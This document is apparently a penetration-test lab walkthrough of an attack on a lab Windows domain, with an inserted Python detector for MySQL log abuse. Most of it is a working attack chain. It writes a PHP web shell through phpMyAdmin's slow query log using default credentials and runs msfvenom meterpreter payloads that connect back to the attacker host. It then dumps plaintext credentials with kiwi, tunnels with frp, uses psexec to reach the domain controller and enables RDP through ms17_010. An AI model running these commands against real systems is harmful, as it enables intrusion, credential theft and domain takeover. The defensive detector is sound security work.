kali: 192.168.111.111 (NAT)
win7: 192.168.111.142 (NAT), 192.168.52.143 (VMnet3)
2008: 192.168.52.138 (VMnet3)
2003: 192.168.52.141 (VMnet3)
Information gathering
Port scanning
Directory brute-forcing
phpMyAdmin weak credentials root:root. After logging in to phpMyAdmin, write a shell by running the SQL statements below (the slow query log is pointed at a file under the web root, and a slow query containing PHP code is then recorded into that file):
set global slow_query_log=1;
set global slow_query_log_file='C://phpStudy//WWW//shell.php'; # absolute path leaked by phpinfo
select '<?php @eval($_POST[cmd]);?>' or sleep(11);
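A defender-side check for the log-file write above, added here as an example and not part of the original write-up: it flags MySQL log variables that point into the web root (the phpStudy path from the write-up is assumed) or carry a script extension, and scans recorded query history for the same SET statement or for PHP open tags. The web root and the sample general-log lines are constructed.

```python
import re

# Assumed lab values taken from the write-up: phpStudy web root on Windows.
WEB_ROOT = r"C:\phpStudy\WWW"
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")
LOG_VARS = ("slow_query_log_file", "general_log_file", "log_error")

# SET [GLOBAL] <log variable> = '<path>'  (also the @@global.<var> form)
SET_LOG_RE = re.compile(
    r"set\s+(?:global\s+|@@global\.)?(slow_query_log_file|general_log_file|log_error)"
    r"\s*=\s*(['\"])(.+?)\2", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)  # PHP open tag in a query

def normalize(path: str) -> str:
    """Lower-case and collapse the separators MySQL tolerates ('//', '/', '\\')."""
    return re.sub(r"[\\/]+", r"\\", path.strip().strip("'\"")).lower()

def is_dangerous_log_path(path: str, web_root: str = WEB_ROOT) -> bool:
    """True if a log file would land inside the web root or be served as a script."""
    p = normalize(path)
    root = normalize(web_root).rstrip("\\") + "\\"
    return p.startswith(root) or p.endswith(SCRIPT_EXTS)

def check_variables(variables: dict) -> list:
    """variables: name -> value, e.g. parsed from SHOW GLOBAL VARIABLES output."""
    return [(v, variables[v]) for v in LOG_VARS
            if variables.get(v) and is_dangerous_log_path(variables[v])]

def scan_query_log(lines) -> list:
    """Flag log-file redirection and PHP tags in recorded SQL statements."""
    hits = []
    for line in lines:
        m = SET_LOG_RE.search(line)
        if m and is_dangerous_log_path(m.group(3)):
            hits.append((m.group(1), m.group(3)))
        elif PHP_TAG_RE.search(line):
            hits.append(("php_tag_in_query", line.split("\t")[-1].strip()))
    return hits

# Constructed sample: MySQL general-log lines mirroring the sequence above.
SAMPLE_LOG = [
    "2024-05-01T10:00:01.000000Z\t   12 Query\tSHOW VARIABLES LIKE 'version'",
    "2024-05-01T10:00:05.000000Z\t   12 Query\tset global slow_query_log=1",
    "2024-05-01T10:00:06.000000Z\t   12 Query\tset global slow_query_log_file='C://phpStudy//WWW//shell.php'",
    "2024-05-01T10:00:07.000000Z\t   12 Query\tselect '<?php /* constructed */ ?>' or sleep(11)",
]

if __name__ == "__main__":
    print(scan_query_log(SAMPLE_LOG))
```

Both findings (the redirected log path and the PHP tag in a deliberately slow query) fire on the sample; in production, feed it the general log, an audit plugin's output, or phpMyAdmin's SQL history, and alert on any hit.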
Generate a payload with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.111 lport=4444 -f exe -o shell.exe
Upload it with Godzilla (哥斯拉) and run it
Session arrives in msf
Domain information gathering
net time /domain # get the domain controller's hostname
net view # list the hostnames of machines in the domain
Get the IPs of the domain hosts:
ping OWA -n 1
ping ROOT-TVI862UBEH -n 1
net group "domain controllers" /domain # get the domain controller's hostname
Process injection to obtain SYSTEM privileges
Dump plaintext credentials
load kiwi
creds_kerberos
Build a SOCKS tunnel with frp
Get a session on the domain controller with psexec
# generate the payload
msfvenom -p windows/meterpreter/bind_tcp rhost=192.168.52.138 lport=4444 -f exe -o shell.exe
# connect to the domain controller
proxychains4 impacket-psexec god.org/administrator@192.168.52.138
lput /tmp/shell.exe
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.52.138   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
Use auxiliary/admin/smb/ms17_010_command to enable 3389 (RDP) and get access
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
proxychains4 rdesktop 192.168.52.141